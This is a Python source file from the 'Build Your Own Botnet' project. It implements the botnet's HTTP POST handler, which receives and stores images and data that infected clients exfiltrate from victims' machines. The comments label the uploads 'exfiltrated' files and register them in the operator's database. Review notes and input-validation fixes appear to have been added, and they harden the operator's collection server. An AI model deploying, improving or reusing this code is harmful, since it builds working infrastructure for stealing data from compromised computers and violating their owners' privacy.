GitHub Repository: malwaredllc/byob
Path: blob/master/web-gui/buildyourownbotnet/core/handler.py
#!/usr/bin/python
'POST Request Handler (Build Your Own Botnet)'
# standard library (requests, imported last, is a third-party package)
import os
import sys
import json
import string
import base64
import random
import requests
# The server classes live in BaseHTTPServer on Python 2 and in http.server
# on Python 3; import them from whichever module this interpreter provides.
if sys.version_info[0] >= 3:
    from http.server import BaseHTTPRequestHandler, HTTPServer
else:
    from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer

# Root directory for saved uploads; main() overwrites it from the command line.
OUTPUT_DIR = ''
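class Handler(BaseHTTPRequestHandler):
    """
    HTTP POST request handler for clients uploading
    captured images/data to the server

    The JSON body supplies `owner` and `filename`, and both become part of
    the path written to disk, so each is required to be a single plain path
    component before it is used.

    NOTE(review): nothing in this handler authenticates the sender; any
    client that can reach the port can store a file under any `owner`.
    """

    def _set_headers(self):
        """Send a 200 status line and a text/html Content-type, then end the headers."""
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    @staticmethod
    def _is_text(value):
        """Return True for str values (and unicode values on Python 2)."""
        return isinstance(value, (str, type(u'')))

    @staticmethod
    def _is_plain_name(value):
        """
        Return True when `value` is usable as exactly one path component.

        Rejects non-text values, the empty string, '.' and '..', and anything
        containing a path separator or a NUL byte, so that joining the value
        onto a directory cannot leave that directory.
        """
        if not Handler._is_text(value) or value in ('', '.', '..'):
            return False
        return not any(ch in value for ch in ('/', '\\', '\x00'))

    def do_POST(self):
        """
        Handle incoming HTTP POST request

        Expects a JSON object with the keys `data` (base64 file content),
        `type`, `owner`, `module`, `session` and `filename`. A request that
        cannot be parsed, or whose `owner`/`filename` would place the file
        outside `<OUTPUT_DIR>/<owner>/files`, is answered with 400 and nothing
        is written. Otherwise a single 200 response is sent, the file is
        registered through the internal API and then saved.
        """
        # Content-Length must be a non-negative integer: a missing header used
        # to raise, and a negative value makes rfile.read() wait for EOF.
        try:
            length = int(self.headers.get('Content-Length'))
        except (TypeError, ValueError):
            length = -1
        if length < 0:
            self.send_error(400)
            return

        # NOTE(review): the body size has no upper bound, so a single request
        # can make the server buffer an arbitrarily large upload in memory.
        self.data_string = self.rfile.read(length)

        try:
            json_data = json.loads(self.data_string)
        except (TypeError, ValueError):
            json_data = None
        if not isinstance(json_data, dict):
            self.send_error(400)
            return

        b64_data = json_data.get('data')
        filetype = json_data.get('type')
        owner = json_data.get('owner')
        module = json_data.get('module')
        session = json_data.get('session')
        filename = json_data.get('filename')

        # decode any base64 values
        try:
            data = base64.b64decode(b64_data)
            if self._is_text(session) and session.startswith('_b64'):
                # NOTE(review): four characters are tested but six are skipped;
                # presumably the full marker is six characters long - confirm
                # against the client code.
                session = base64.b64decode(session[6:]).decode('ascii')
        except (TypeError, ValueError):
            self.send_error(400)
            return

        # generate random filename if not specified
        if not filename:
            if not self._is_text(filetype):
                self.send_error(400)
                return
            # add . to file extension if necessary
            if not filetype.startswith('.'):
                filetype = '.' + filetype
            # string.lowercase exists only on Python 2; ascii_lowercase works
            # on both. Three characters collide easily, and a collision
            # overwrites the earlier file.
            alphabet = string.ascii_lowercase + string.digits
            filename = ''.join(random.choice(alphabet) for _ in range(3)) + filetype

        # owner and filename come straight from the request body; an absolute
        # path or a '..' segment in either would move the write elsewhere.
        if not (self._is_plain_name(owner) and self._is_plain_name(filename)):
            self.send_error(400)
            return

        files_dir = os.path.realpath(os.path.join(OUTPUT_DIR, owner, 'files'))
        output_path = os.path.join(files_dir, filename)
        # Second check after resolving symlinks: the file must sit directly
        # inside the owner's files directory.
        if os.path.dirname(os.path.realpath(output_path)) != files_dir:
            self.send_error(400)
            return

        # Respond once; sending a second status line after the headers were
        # closed put it into the response body.
        self._set_headers()

        # add exfiltrated file to database via internal API call
        # The timeout keeps a stalled API from blocking this handler forever.
        requests.post(
            "http://0.0.0.0/api/file/add",
            {"filename": filename, "owner": owner, "module": module, "session": session},
            timeout=10,
        )

        # save exfiltrated file to user directory
        with open(output_path, 'wb') as fp:
            fp.write(data)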
def run(server_class=HTTPServer, handler_class=Handler, port=80):
    """
    Create the HTTP server and serve requests until the process stops.

    `server_class` is instantiated with the listen address and
    `handler_class`; `port` is the TCP port to listen on.
    """
    # '0.0.0.0' binds every IPv4 interface of the host, not only loopback.
    listen_address = ('0.0.0.0', port)
    server = server_class(listen_address, handler_class)
    server.serve_forever()
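def main():
    """
    Command-line entry point, called as PORT OUTPUT_DIR.

    Stores the second argument in the module-level OUTPUT_DIR, which
    Handler.do_POST uses as the root for saved uploads, then serves on the
    given port. Exits with a usage message when an argument is missing or
    the port is not an integer.
    """
    global OUTPUT_DIR
    usage = 'usage: {} PORT OUTPUT_DIR'.format(sys.argv[0])
    # Fail with a readable message instead of an IndexError traceback.
    if len(sys.argv) < 3:
        sys.exit(usage)
    try:
        port = int(sys.argv[1])
    except ValueError:
        sys.exit(usage)
    OUTPUT_DIR = sys.argv[2]
    run(port=port)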
# Start the upload server only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == '__main__':
    main()